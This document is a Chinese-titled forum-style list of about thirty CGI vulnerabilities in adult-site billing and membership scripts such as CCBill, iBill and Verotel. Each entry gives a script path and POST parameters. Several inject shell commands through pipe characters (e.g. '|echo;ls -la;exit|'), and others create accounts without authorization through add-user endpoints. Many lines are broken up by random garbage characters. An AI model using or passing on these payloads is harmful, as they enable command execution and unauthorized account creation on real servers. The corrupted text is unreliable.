Cgi-bin 30个漏洞＋使用方法

admin

==============================
& Z( |) B% b# Z4 `
/smspass.pl
$ u+ r7 h; I; h' M  f: u3 t9 zusername=username&password=password

. s! a4 v# x( V" ~" u/index.cgi
& Q0 X3 ^/ c# w& M9 F, Jwei=ren&gen=command

8 Q- M5 F; }% J9 `5 B- q/passmaster.cgi
0 u8 m3 A6 ~+ K5 H( T) h# ~Action=Add&Username=Username&Password=Password
" R0 a8 J- M1 Q" A
/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
8 W6 d& f  A+ t5 l2 e0 f
/form.cgi
8 h' b" |+ i) ~& `4 W8 h4 {& d4 qname=xxxx&email=email&subject=xxxx&response=|echo;ls|

/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password

7 p, Y: A- Z/ F  a' `/ccbill-local.asp
post_values=username:password
7 L$ j/ o% W2 [) w
" ]% o! Z& x# ]; d2 z/count.cgi
pinfile=|echo;ls -la;exit|

0 w  c% x- @) j/recon.cgi
4 c2 r% `  S4 i' {+ X% o/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
/ d* ^% f/ M% H7 \0 I
/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>

/af.cgi
_browser_out=|echo;ls -la;exit;|

/modify.cgi
  p8 y  k. x  \/ N5 q  nusername=username&password=password&expire=30

6 C+ w- c4 d, v$ R: O' p/openjournal.cgi
4 R3 w% e, w* o: ?2 \edit=1&ct=2&go=|echo;ls -al;exit|
. H% _) `: o) A3 n( K6 G
' p+ d! |& @5 V/ t. Z' g/gx9passwd.cgi
cmd=ADD&user=username&pass=password

/probecontrol.cgi
4 i/ n, n4 r: k% ecommand=enable&username=username&password=password

/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit

/htadd.pl
configfile=|echo; ls -alt; exit

0 T# {& a* U& ?: c5 x. }( M/gx9passwd.cgi
cmd=ADD&user=username&pass=password
' M1 r+ o" ?& G; E0 z4 C
8 T! z2 D( L% b0 U) T% |0 O& t/ibill*.pl
7 T3 w  g- o8 r# \/ y! [) Nreqtype=add&authpwd=authpwd&username=username&password=password

/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)

) {# Z- G4 i( I7 }' u4 J/globill_ut.cgi
do=add&username=username&password=password&wpassword=password

  D4 o; E) M, d! ]8 C# C5 w/usercontrol.cgi
9 i- g4 e) G. O0 K6 vcommand=enable&username=USER&password=PASS
1 y3 C. R8 A6 P# \6 e
! S4 ?8 i: }2 e: Q4 a6 q/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

* u! c' T+ ?; Q# u0 _) Y) ]( J/addusr.pl
user=USER&pass=PASS&confirm=PASS
( H& _: A7 q& G0 u- @( ]% B) J
- c- t* }- B( r! T# |# X+ T! p/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|
# G" R% ]* e8 H5 H( S
  b9 O; n) w: M  y3 h) n) e/accountcreate.cgi
- \8 O, h) |7 e- e/cgi-bin/gateway/accountcreate.cgi
# _  S9 e5 d6 T* V) B) zusername=username&password=password&password2=password&ref1=|echo;ls -al;exit

4 H" d: w$ I! ]/af.cgi
/env.cgi
. ]* S! o, M# f1 n4 GADD+;echo;pwd;exit

/count.cgi
3 C" b& W. i8 h/ q6 Y5 d1 B7 ^pinfile=|echo;pwd;exit|
9 r* V- r* {, \! o; o
/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|
# ?4 S# q; v, h# Y7 c% m1 ^
/add.cgi
7 |+ d, @) c0 `' L. uusername=username&password=password&expire=30

==============================
! r" s' I8 a. b% Y& d